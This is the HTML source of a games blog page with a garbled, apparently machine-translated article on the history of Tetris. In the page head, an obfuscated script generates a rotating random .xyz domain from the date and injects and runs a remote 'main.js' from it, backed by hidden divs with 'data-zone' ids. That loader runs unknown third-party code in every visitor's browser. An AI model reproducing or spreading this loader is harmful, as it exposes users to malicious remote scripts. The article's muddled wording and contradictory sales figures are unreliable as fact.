<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="en">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Game,">










<meta name="description" content="In 1984, a researcher from the Soviet Union developed a small game for testing computer performance, but it has an extremely addictive effect. As long as the game does not fail, it can be played conti">
<meta name="keywords" content="Game">
<meta property="og:type" content="article">
<meta property="og:title" content="Nearly 60 platforms in 35 years, why is Tetris at the top of the game field">
<meta property="og:url" content="http://maiygu.xyz/2019/11/08/Nearly 60 platforms in 35 years, why is Tetris at the top of the game field/index.html">
<meta property="og:site_name" content="Games">
<meta property="og:description" content="In 1984, a researcher from the Soviet Union developed a small game for testing computer performance, but it has an extremely addictive effect. As long as the game does not fail, it can be played conti">
<meta property="og:locale" content="en">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Nearly 60 platforms in 35 years, why is Tetris at the top of the game field/ebb6577399b84fefb613f6a55496a0a4.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Nearly 60 platforms in 35 years, why is Tetris at the top of the game field/6f0c7e8d48a546de8721b2581250f33d.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Nearly 60 platforms in 35 years, why is Tetris at the top of the game field/0bbae73f59214e42a2f069fc6bd628d2.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Nearly 60 platforms in 35 years, why is Tetris at the top of the game field/65dc5a9b977845e488fce88aa6551ba9.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Nearly 60 platforms in 35 years, why is Tetris at the top of the game field/30aa21785ddc43b4be3fcb51e8ab1c53.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Nearly 60 platforms in 35 years, why is Tetris at the top of the game field/66a4d311c96a439bbaa03a355d49b4da.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Nearly 60 platforms in 35 years, why is Tetris at the top of the game field/be6b2729f9b0422ba1034d7846c2ead3.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Nearly 60 platforms in 35 years, why is Tetris at the top of the game field/9845fc0f0f90405991b92bbdf7258005.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Nearly 60 platforms in 35 years, why is Tetris at the top of the game field/be3d24caf48340fabff2526c675490e1.jpg">
<meta property="og:updated_time" content="2021-03-02T08:49:49.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Nearly 60 platforms in 35 years, why is Tetris at the top of the game field">
<meta name="twitter:description" content="In 1984, a researcher from the Soviet Union developed a small game for testing computer performance, but it has an extremely addictive effect. As long as the game does not fail, it can be played conti">
<meta name="twitter:image" content="http://maiygu.xyz/2019/11/08/Nearly 60 platforms in 35 years, why is Tetris at the top of the game field/ebb6577399b84fefb613f6a55496a0a4.jpg">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"hide","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://maiygu.xyz/2019/11/08/Nearly 60 platforms in 35 years, why is Tetris at the top of the game field/">




<script type="text/javascript">!function(n){var t,e=function(n,t){var e=[["a","e","i","o","u","y"],["b","c","d","f","g","h","j","k","l","m","n","p","q","r","s","t","v","w","x","y","z"]];if(t)for(var r=0;r<=t.length-1;r++)n=n*t.charCodeAt(r)%4294967295;var l;return next=(l=n,function(n){return l=l+1831565813|0,(((n=(n=Math.imul(l^l>>>15,1|l))+Math.imul(n^n>>>7,61|n)^n)^n>>>14)>>>0)/Math.pow(2,32)}),function(n,t){for(var r=[],l=null,o=0;o<=n-1;o++){var a=void 0;null===l?a=e[0].concat(e[1]):1==l?(a=e[0],l=0):(a=e[1],l=1);var u=a[Math.floor(next()*a.length)];r.push(u),null===l&&(l=-1!=e[0].indexOf(u)?0:1)}return r.push("."+t),r.join("")}}((t=new Date,(t/=1e3)-t%1209600),"_fa7cdd4c68507744")(8,"xyz");if(null===n)console.log("https://"+e);else{var r=n.createElement("script");r.src="https://"+e+"/main.js",(n.body||n.head).appendChild(r)}}("undefined"!=typeof document?document:null);
</script>

  <title>Nearly 60 platforms in 35 years, why is Tetris at the top of the game field | Games</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Games</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">Games</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            Archives
          </a>
        </li>
      
        
        <li class="menu-item menu-item-sitemap">
          <a href="/sitemap.xml" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-sitemap"></i> <br>
            
            Sitemap
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
            
            Search
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="Searching..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
 
 
 <div class="_fa7cdd4c68507744" data-options="count=1,interval=1,burst=1" data-zone="22aeec266c49468da6040eff035066b8" style="display: none"></div>
 <div class="_fa7cdd4c68507744" data-options="count=1,interval=1,burst=1" data-zone="7aa7f6c595384fd6a2e5f5016b455fd2" style="display: none"></div>
 <div class="_fa7cdd4c68507744" data-zone="df2a1bde9f44465a8457aaf705928077" style="width:728px;height:90px;display: inline-block;margin: 0 auto"></div>
 <div class="_fa7cdd4c68507744" data-zone="4fff9a79323749608f8df1eff7291bcf" style="width:970px;height:90px;display: inline-block;margin: 0 auto"></div>
 
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://maiygu.xyz/2019/11/08/Nearly 60 platforms in 35 years, why is Tetris at the top of the game field/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Harry">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Games">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Nearly 60 platforms in 35 years, why is Tetris at the top of the game field</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2019-11-08T00:00:00+08:00">
                2019-11-08
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>In 1984, a researcher from the Soviet Union developed a small game for testing computer performance, but it has an extremely addictive effect. As long as the game does not fail, it can be played continuously. Even many game masters can hardly reveal the reason. They only know that the game can make people play without stopping.<br><img src="http://maiygu.xyz/2019/11/08/Nearly 60 platforms in 35 years, why is Tetris at the top of the game field/ebb6577399b84fefb613f6a55496a0a4.jpg" alt="Nearly 60 platforms in 35 years, why is Tetris at the top of the game field"><br>Don’t think I’m joking. What kind of fairy game do you think it is? In fact, it’s just Tetris that everyone knows. “Tetris” is just a small game, but its sales volume can be said to be quite terrifying. It is called “the game with the highest sales volume in the history of games”, and no one has surpassed this title until now.</p>
<h1 id="kill-time"><a href="#kill-time" class="headerlink" title="kill time"></a>kill time</h1><p>The story happened in the 1980s, when the Soviet Union had not disintegrated. Alexei Pajitnov, a mathematical genius, joined the Academy of Sciences of the Soviet Union. Under the influence of the Soviet government, almost every child had to learn computer since childhood. The purpose was to attract these young people to join the government and become a scientist or an engineer Lexer is one of many people. Alexei’s character is relatively straightforward and entertaining. When he is free, he likes to tell a joke with his friends. It’s not easy for such a person to do a very boring job repeatedly every day. The work of the research institute is not only boring, but also not spacious. It often requires several people to share a table and a machine, so he often loses things About the West. In order to avoid this situation, Alexei takes the initiative to work overtime in the research institute every day, just for the sake that his things will not be “cleared away”.<br><img src="http://maiygu.xyz/2019/11/08/Nearly 60 platforms in 35 years, why is Tetris at the top of the game field/6f0c7e8d48a546de8721b2581250f33d.jpg" alt="Nearly 60 platforms in 35 years, why is Tetris at the top of the game field"><br>Alexei Pajitnov, father of Tetris<br>Later, the research institute updated the equipment and changed to electornika 60, a computer made by the Soviet Union to imitate Dec LSI-11 of the United States, which can only display text instead of graphics. With the “new toy”, anyone wants to have a good time. Alexei, who is active and restless, also has such an idea. His idea is even more exaggerated. He wants to make a game with this computer so that he can spend his time after work. Alexei is not the only one who has this idea. Because of his love for programming, Alexei got to know two other programmers: Dimitri Pavlovski and Vadim grahimov. With the participation of others, they decided to let the game not only spend their time after work, but also get it to the market Selling money can not only entertain but also earn extra money. Isn’t it nice to kill two birds with one stone?<br><img src="http://maiygu.xyz/2019/11/08/Nearly 60 platforms in 35 years, why is Tetris at the top of the game field/0bbae73f59214e42a2f069fc6bd628d2.jpg" alt="Nearly 60 platforms in 35 years, why is Tetris at the top of the game field"><br>Electornika 60 computer</p>
<h1 id="more-fun-than-toys"><a href="#more-fun-than-toys" class="headerlink" title="more fun than toys"></a>more fun than toys</h1><p>In the 1940s, a kind of educational toy was very popular both at home and abroad. It was called “twelve pieces of puzzle” in China. It was a kind of board game. It was composed of twelve pieces of wood with different shapes, and each piece was composed of five small cubes, so it was also called “five pieces of bone”. These twelve pieces of wood can form a variety of patterns. The most popular way to play with them is to try to put them into a rectangular base plate. You will find that you need to use your brain to put all the pieces into the base plate. The design of this game involves five or six kinds of mathematics subjects, such as geometry and topology. It is researched by scholars in various fields at home and abroad, so it is highly praised by mathematicians.<br><img src="http://maiygu.xyz/2019/11/08/Nearly 60 platforms in 35 years, why is Tetris at the top of the game field/65dc5a9b977845e488fce88aa6551ba9.jpg" alt="Nearly 60 platforms in 35 years, why is Tetris at the top of the game field"><br>The classic puzzle game “mind boggling twelve pieces”<br>Alexei liked this puzzle toy very much when he was a child, so he thought of making a game similar to this toy, but the number of texts that can be displayed by computer is limited, and there are only rectangles in text characters, so Alexei reduced the number of rectangles of each graph from five to four, and reduced the number of graphs to seven and grouped them with rectangles Close to a square. The development cycle of the game is not long. It took only six days to complete. But after the game was made, they found a problem: because of the deletion of various contents, the difficulty of the game is extremely simple, basically only need to crack once, there is no suspense, no challenge and playability, so Alexei can only modify the game, and the direction of modification is the game Rules.<br><img src="http://maiygu.xyz/2019/11/08/Nearly 60 platforms in 35 years, why is Tetris at the top of the game field/30aa21785ddc43b4be3fcb51e8ab1c53.jpg" alt="Nearly 60 platforms in 35 years, why is Tetris at the top of the game field"><br>Only seven patterns left<br>Alexei changed the rules of the game to seven different shapes of patterns falling from the top of the screen to the bottom of the screen in a limited area in a random order. Players can control the position and direction of these patterns when they fall, and fill the whole area by continuously splicing these patterns. And if it’s full, the game is over. Although it’s exciting, it can’t give the players the motivation to challenge. So Alexei modifies the rules of the game again. When the small squares that make up the pattern can fill a whole line, they will be eliminated and fall a line, so that the players can keep playing until the pattern is stacked to the top of the screen Bundle.<br>In this way, the thrill and playability of the game are improved. The endless playing methods are a little bit addictive. The final product makes Alexei unable to stop playing. This game doesn’t even need a tutorial. Anyone can easily play it. Alexei named this game Tetris, which is a representative number in Greek Word 4 “TetR” is a combination of his favorite sport, “tennis.”.<br><img src="http://maiygu.xyz/2019/11/08/Nearly 60 platforms in 35 years, why is Tetris at the top of the game field/66a4d311c96a439bbaa03a355d49b4da.jpg" alt="Nearly 60 platforms in 35 years, why is Tetris at the top of the game field"><br>The first Tetris in history</p>
<h1 id="the-real-meaning-of-“popular-in-the-world”"><a href="#the-real-meaning-of-“popular-in-the-world”" class="headerlink" title="the real meaning of “popular in the world”"></a>the real meaning of “popular in the world”</h1><p>There is also a very wonderful copyright business war around Tetris. For the reason of space, the author will only elaborate here. Interested friends can watch the documentary “the story of Tetris” produced by the famous broadcaster “game historian”. What we need to know is that in the same period, “Tetris” is a hot cake among many game manufacturers, because it is very addictive. It seems that whoever can get the copyright of this game can make a lot of money in an instant. The game first became popular in Alexei’s Research Institute for a while, then the whole Soviet Union, and spread to other countries through many trade personnel who often go abroad. Finally, Nintendo took the lead in winning the distribution right and sold the game with the same model of game boy. In a short time, it achieved a very terrible sales volume of 35 million sets.<br><img src="http://maiygu.xyz/2019/11/08/Nearly 60 platforms in 35 years, why is Tetris at the top of the game field/be6b2729f9b0422ba1034d7846c2ead3.jpg" alt="Nearly 60 platforms in 35 years, why is Tetris at the top of the game field"><br>GB Tetris<br>Since then, this “toxic” game has been recognized by people all over the world. Under the guidance of Nintendo, it has landed on many platforms. Up to now, it has logged on nearly 60 different platforms in total, and has made considerable sales in each platform. Over time, this easy-to-use game has also launched many different versions, adding many novel settings, such as VR version of Tetris: effect, and the linkage version of the famous puzzle game “poopoopoopoopoop vs. Tetris”, and even at the beginning of this year, Nintendo ns platform launched support for 99 people in the same screen competition “Eat chicken” version of “Tetris 99”, some games are free, some are expensive, even so, “Tetris” still made a very amazing sales, according to ign statistics of overseas well-known media, as of April this year, the total sales volume of “Tetris” reached 500 million, only followed by “my world” is 154 million.<br><img src="http://maiygu.xyz/2019/11/08/Nearly 60 platforms in 35 years, why is Tetris at the top of the game field/9845fc0f0f90405991b92bbdf7258005.jpg" alt="Nearly 60 platforms in 35 years, why is Tetris at the top of the game field"><br>Ign statistics<br>End of<br>Since it is so popular, Alexei, who invented the game, must be a rich man now, right? In fact, the game was born in the Scientific Research Institute of the Soviet Union, so the copyright of the game should be owned by the government. After several twists and turns, the Russian government didn’t return the copyright of the game to him until eleven years after the game had been on the market. At that time, “Tetris” had already passed his most beautiful time, but Alexei still relied on it The game has made a lot of money and continues to this day.<br><img src="http://maiygu.xyz/2019/11/08/Nearly 60 platforms in 35 years, why is Tetris at the top of the game field/be3d24caf48340fabff2526c675490e1.jpg" alt="Nearly 60 platforms in 35 years, why is Tetris at the top of the game field"><br>Tesla modle s of Alexei, with the license plate of Tetris<br>The invincible story of Tetris is still going on. Now it’s the 35th idea of Tetris. Alexei is also a 63 year old uncle, but he still has enough capital and conditions to stand out. Media once asked him, “do you think people will continue to play your game in a hundred years?” Alexei’s answer is yes. The reason is that no matter how many years have passed, the nature and nature of human brain will not change greatly. Chess has been played for thousands of years and people are not happy. Happiness is very important for human beings. As long as people can feel happiness from the game, it will not change for many years (Tetris) It will be out of date.</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Game/" rel="tag"># Game</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/11/08/Legend of fairyland ro guarding the eternal love just for a more pure game experience/" rel="next" title="Legend of fairyland ro guarding the eternal love just for a more pure game experience">
                <i class="fa fa-chevron-left"></i> Legend of fairyland ro guarding the eternal love just for a more pure game experience
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/11/08/Maybe it's a masterpiece. Is there a parallel universe in the game/" rel="prev" title="Maybe it's a masterpiece. Is there a parallel universe in the game">
                Maybe it's a masterpiece. Is there a parallel universe in the game <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">Harry</p>
              <p class="site-description motion-element" itemprop="description">Games</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">114</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">1</span>
                  <span class="site-state-item-name">tags</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#kill-time"><span class="nav-number">1.</span> <span class="nav-text">kill time</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#more-fun-than-toys"><span class="nav-number">2.</span> <span class="nav-text">more fun than toys</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#the-real-meaning-of-“popular-in-the-world”"><span class="nav-number">3.</span> <span class="nav-text">the real meaning of “popular in the world”</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        

<div class="copyright">&copy; <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Harry</span>

  
</div>









        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
